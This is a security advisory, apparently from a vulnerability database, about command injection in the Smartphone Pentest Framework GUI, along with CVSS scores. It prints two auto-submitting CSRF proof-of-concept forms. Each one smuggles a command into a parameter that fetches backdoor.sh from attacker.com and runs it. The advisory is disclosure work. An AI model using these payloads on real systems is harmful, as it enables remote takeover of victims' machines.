9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.06 Low
EPSS
Percentile
92.7%
High-Tech Bridge Security Research Lab discovered multiple command execution vulnerabilities in Smartphone Pentest Framework (SPF) web-based GUI, which could be exploited to get control over a pentester’s machine remotely.
Similar vulnerabilities were discovered (https://www.immuniweb.com/advisory/HTB23123, CVE-2012-5693) in the previous version (0.1.2) of SPF and were patched by vendor.
However, multiple CSRF vulnerabilities (HTB23123, CVE-2012-5695) were not patched by the vendor. Therefore even if the web server hosting SPF GUI is not accessible from the Internet (which is a case for the majority of pentesters) the vulnerabilities can still be easily exploited via a local/internal network, or even from the Internet via CSRF vector. In default installation of Smartphone Pentest Framework its web server port and application path of its GUI are easily predictable: localhost:80/frameworkgui/
Please refer to HTB23123 advisory (https://www.immuniweb.com/advisory/HTB23123) for detailed attack scenarios examples.
1.2 The vulnerability exists in “CSAttack.pl” script due to insufficient validation of user-supplied input passed via the “hostingPath” parameter. The vulnerability can be exploited remotely via CSRF vector:
<form action=“http://localhost/cgi-bin/frameworkgui/CSAttack.pl” method=“post” name=f1>
<input type=“hidden” name=“hostingPath” value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ’ />
<input type=“submit” id=“btn”>
</form>
<script>
document.f1.Submit()
</script>
1.3 The vulnerability exists in “attachMobileModem.pl” script due to insufficient validation of user-supplied input passed via the “appURLPath” parameter. The vulnerability can be exploited remotely via CSRF vector:
<form action=“http://localhost/cgi-bin/frameworkgui/attachMobileModem.pl” method=“post” name=f1>
<input type=“hidden” name=“appURLPath” value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ’ />
<input type=“submit” id=“btn”>
</form>
<script>
document.f1.Submit()
</script>
CPE | Name | Operator | Version |
---|---|---|---|
smartphone pentest framework (spf) | le | 0.1.3 | |
smartphone pentest framework (spf) | le | 0.1.4 |
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.06 Low
EPSS
Percentile
92.7%